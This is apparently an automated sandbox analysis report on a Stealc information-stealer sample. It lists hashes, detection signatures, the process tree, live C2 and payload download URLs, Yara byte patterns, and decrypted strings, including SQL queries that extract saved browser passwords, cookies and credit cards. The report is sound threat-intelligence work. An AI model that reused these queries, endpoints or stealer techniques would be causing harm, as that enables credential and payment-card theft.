Edit tour

Windows Analysis Report
SEejSLAS9f.exe

Overview

General Information

Sample name:	SEejSLAS9f.exe renamed because original name is a hash value
Original sample name:	f538d845b52f9d902ee451636d79df4d.exe
Analysis ID:	1572886
MD5:	f538d845b52f9d902ee451636d79df4d
SHA1:	19b2b01778f50ce375ccfa4c33602b5c5665ccaf
SHA256:	9a1c659df3f2a04d8982ea66ce8397736c98eda3059ceebc467033ac35e176ed
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SEejSLAS9f.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\SEejSLAS9f.exe" MD5: F538D845B52F9D902EE451636D79DF4D)

1D71.tmp.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe" MD5: 9D773E345DCA0487C5654A92E6340BAA)

WerFault.exe (PID: 7420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1598:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1598:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 1D71.tmp.exe PID: 7860	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 1D71.tmp.exe PID: 7860	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.1D71.tmp.exe.24b0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.3.1D71.tmp.exe.24b0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.1D71.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.1D71.tmp.exe.2470e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.1D71.tmp.exe.2470e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.1D71.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T06:57:07.856254+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49732	92.255.57.89	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T06:57:00.801518+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-11T06:57:02.574995+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.89/s	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpo	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php;	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll~	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php2dPf	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEI	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: SEejSLAS9f.exe	ReversingLabs: Detection: 42%
Source: SEejSLAS9f.exe	Virustotal: Detection: 38%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SEejSLAS9f.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 26
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 12
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 20
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 24
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: lstrcatA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: OpenEventA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateEventA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CloseHandle
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Sleep
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: VirtualFree
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: lstrlenA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ExitProcess
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: user32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateDCA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sscanf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HAL9TH
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: JohnDoe
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DISPLAY
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: http://92.255.57.89
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: /45c616e921a794b8.php
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: /697b92cb4e247842/
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: default
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HeapFree
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetFileSize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GlobalSize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Process32Next
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Process32First
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: LocalFree
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: FindClose
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ReadFile
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: WriteFile
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateFileA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CopyFileA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetLastError
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GlobalFree
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: OpenProcess
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ole32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: wininet.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: shell32.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SelectObject
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BitBlt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DeleteObject
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GdipFree
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CoInitialize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetDC
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CloseWindow
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: wsprintfA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CharToOemW
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: wsprintfW
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: StrStrA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RmStartSession
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RmGetList
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: RmEndSession
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: encrypted_key
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PATH
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: NSS_Init
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: browser:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: profile:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: url:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: login:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: password:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Opera
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: OperaGX
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Network
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: cookies
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: .txt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: TRUE
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: FALSE
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: autofill
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: history
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: cc
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: name:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: month:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: year:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: card:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Cookies
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Login Data
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Web Data
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: History
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: logins.json
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: usernameField
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: guid
